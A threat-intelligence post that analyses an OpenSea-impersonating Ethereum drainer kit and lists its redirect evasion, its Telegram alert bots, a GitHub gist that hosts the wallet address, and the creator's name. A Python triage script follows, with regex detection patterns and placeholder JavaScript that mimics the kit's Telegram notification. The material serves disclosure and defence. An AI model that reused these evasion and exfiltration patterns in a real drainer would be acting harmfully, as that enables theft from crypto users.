Spotted first by @ecarlesi. ETH drainer impersonating OpenSea. Based on the drainer site's language, the malicious actor/s as well as the targets could be Dutch.
This drainer kit redirects you to a different website if:
- you did not use the correct path
- you previously connected to the website (via storage objects)
It also includes a Telegram bot to alert the malicious actor/s of movements in real time.
Telegram bot used:
chat id: -709367678
admin id: 2146370516
It also retrieves the same ETH wallet address from a GitHub gist: /gist.githubusercontent.com/ethereumjs-tx/020102e055e65567fe158f018fa226c6/raw/4171303cd239f36b6d4781d21786492de783ff9e/SIGN%2520ETH
The account was created recently:
The claim page has a different Telegram bot compared to the document and index.
chat id: -1001599540988
tanjrii is still the creator
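
A triage sketch for the behaviours noted above (storage-gated redirect, Telegram notification, gist-hosted address, a different bot on the claim page), added here as an example and not taken from the kit or from the original report. The page scripts, bot tokens, chat ids and gist URL in it are constructed placeholders, and the regular expressions assume the saved scripts call the Telegram Bot API and `localStorage`/`sessionStorage` in unobfuscated JavaScript.

```python
import re
from collections import defaultdict

BOT_API = re.compile(r"api\.telegram\.org/bot(\d+):[\w-]+/(\w+)")
CHAT_ID = re.compile(r"chat_id[\"'\s:=]+(-?\d{6,})")
GIST_RAW = re.compile(r"gist\.githubusercontent\.com/([\w-]+)/[0-9a-f]+/raw/[^\s\"'`)]*")
STORAGE_KEY = re.compile(r"(?:local|session)Storage\.getItem\(\s*[\"']([^\"']+)[\"']")
REDIRECT = re.compile(r"location\.(?:replace|assign)\(|location\.href\s*=")

# Constructed page scripts (not taken from the kit); every token, id and URL is a placeholder.
_GATE = 'if (localStorage.getItem("connected")) { location.replace("https://example.invalid/"); }\n'
_GIST = 'fetch("https://gist.githubusercontent.com/example-user/0123abcd/raw/addr.txt");\n'

def _notify(bot, chat):
    # Hypothetical helper: builds one constructed Telegram Bot API call as script text.
    return ('fetch("https://api.telegram.org/bot' + bot + ':PLACEHOLDER/sendMessage'
            '?chat_id=' + chat + '&text=" + encodeURIComponent(msg));\n')

SAMPLE_PAGES = {
    "index": _GATE + _notify("1111111111", "-700000001") + _GIST,
    "document": _GATE + _notify("1111111111", "-700000001") + _GIST,
    "claim": _GATE + _notify("2222222222", "-1000000000002") + _GIST,
}

def triage(js):
    """Extract the indicators one saved script exposes, keyed by behaviour."""
    bot = BOT_API.search(js)
    gist = GIST_RAW.search(js)
    return {
        "bot_id": bot.group(1) if bot else None,  # numeric part of the bot token
        "chat_ids": sorted(set(CHAT_ID.findall(js))),
        "gist_owner": gist.group(1) if gist else None,
        "gist_url": gist.group(0) if gist else None,
        "storage_keys": sorted(set(STORAGE_KEY.findall(js))),
        "redirects": bool(REDIRECT.search(js)),
    }

def pages_by_chat(pages):
    """Group page names by the Telegram chat they report to."""
    groups = defaultdict(list)
    for name, js in pages.items():
        for chat in triage(js)["chat_ids"] or ["<none>"]:
            groups[chat].append(name)
    return dict(groups)

if __name__ == "__main__":
    for name, js in SAMPLE_PAGES.items():
        print(name, triage(js))
    print(pages_by_chat(SAMPLE_PAGES))
```

Grouping by chat id makes a page that reports to a different chat, as the claim page does here, stand out immediately, while the gist owner gives an account name to pivot on.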